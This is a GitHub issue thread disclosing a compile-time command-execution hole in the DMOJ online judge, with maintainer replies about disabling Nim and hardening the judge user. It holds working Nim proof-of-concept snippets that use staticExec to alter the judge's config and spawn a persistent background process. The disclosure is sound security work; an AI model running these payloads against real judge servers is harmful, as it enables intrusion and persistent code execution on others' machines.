Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Compilation time command execution vulnerability #318

Closed
apardyl opened this issue Mar 30, 2018 · 2 comments
Closed

Compilation time command execution vulnerability #318

apardyl opened this issue Mar 30, 2018 · 2 comments

Comments

@apardyl
Copy link

apardyl commented Mar 30, 2018

As compilation is not sandboxed user is able to execute arbitrary commands on judge host.
Example in Nim:

import macros
static:
  error(staticExec("echo oops >> /home/dmoj/dmoj.yml"))

The command runs with judge privileges and has full access to the machine. More interesting example:

import macros
static:
  error(staticExec("echo '#include <unistd.h>\n#include <signal.h>\nint main(){if(fork()==0){signal(SIGHUP, SIG_IGN);close(0);close(1);close(2);setsid();while(1){}}return 0;}' > test.c; gcc test.c -o test; ./test;"))

After submitting this to my DMOJ instance (via web interface) the test executable was running even after the judge had returned with a compile error and had to be killed manually. One could simple replace while(1){} with a socket connection/ssh session to a remote machine or any other malicious code.

This issue was first found by @zielmicha

@Xyene
Copy link
Member

Xyene commented Mar 30, 2018

Thanks for reporting this. We've disabled Nim on dmoj.ca.

The DMOJ judge should not (and refuses to) be run as root, and the judge user should set up by the sysadmin to be fairly locked down in its abilities to do anything nefarious (this may include process/disk limits, firewall allowing access to only the bridge address/port, etc.) so that potential damage in case of unsecured code execution is minimized.

That said, Nim allowing arbitrary code execution as part of its regular features is problematic, but we also can't reliably sandbox compilers the same way we do runtimes. It would theoretically be possible to develop some sort of "compilation host" service running inside e.g. Docker instances, but this would be a large engineering effort to be viable right now.

For now, it would probably be best to entirely remove Nim support (unless staticExec and friends can be disabled), and re-examine other less-used executors, in case they have analogous features. The risk of e.g. a buffer overflow in GCC being used to run arbitrary code is small and should be in large part mitigated by locking down the judge user, but users should definitely not be allowed to run arbitrary code out-of-the-box.

Xyene added a commit that referenced this issue Mar 30, 2018
@quantum5
Copy link
Member

Also, we have added security@dmoj.ca for security reports and added https://dmoj.ca/.well-known/security.txt. If there are additional runtimes affected, please send it to that address first.

If you or @zielmicha wish to be credited, we will add it to https://dmoj.ca/security/.

@Xyene Xyene closed this as completed Oct 18, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants